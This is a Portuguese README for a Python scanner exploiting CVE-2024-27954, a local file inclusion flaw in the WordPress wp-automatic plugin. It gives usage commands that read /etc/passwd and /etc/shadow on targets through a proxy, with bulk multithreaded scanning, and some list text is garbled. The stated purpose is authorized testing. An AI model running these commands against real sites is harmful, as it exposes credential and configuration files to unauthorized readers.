
Scanner baseado em Python para CVE-2024-27954, uma vulnerabilidade de Inclusão de Arquivo Local no plugin WordPress wp-automatic. Suporta varredura multithread, integração de proxy e teste de caminhos de arquivo personalizados.
Este projeto oferece um scanner de vulnerabilidade de Inclusão de Arquivo Local (LFI) baseado em Python visando CVE-2024-27954, uma falha crítica encontrada no plugin WordPress wp-automatic. A vulnerabilidade permite que atacantes não autenticados leiam arquivos arbitrários no servidor usando um vetor de injeção file://.
wp-automatic/etc/passwd, arquivos de configuração, código fonte)link não confiável usando esquema file://requestsInstalar dependências:
pip install requests
python3 CVE-2024-27954.py --url http://TARGET --lfi-path /etc/passwd
| Argumento | Descrição |
|---|---|
--url | URL alvo única (ex.: http://TARGET:8080) |
--list | Arquivo contendo lista de URLs alvo (uma por linha) |
--lfi-path | Caminho de arquivo único para testar (padrão: /etc/passwd) |
--paths-file | Arquivo com múltiplos caminhos de arquivo (um por linha) |
--proxy | Proxy (ex.: http://127.0.0.1:8080) |
--output | Arquivo para salvar resultados vulneráveis |
--threads | Número de threads concorrentes (padrão: 3) |
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/passwd --proxy "http://127.0.0.1:8080" --output results.txt
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/shadow --proxy "http://127.0.0.1:8080" --output results.txt
Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. O acesso não autorizado a sistemas pode ser ilegal. Use com responsabilidade.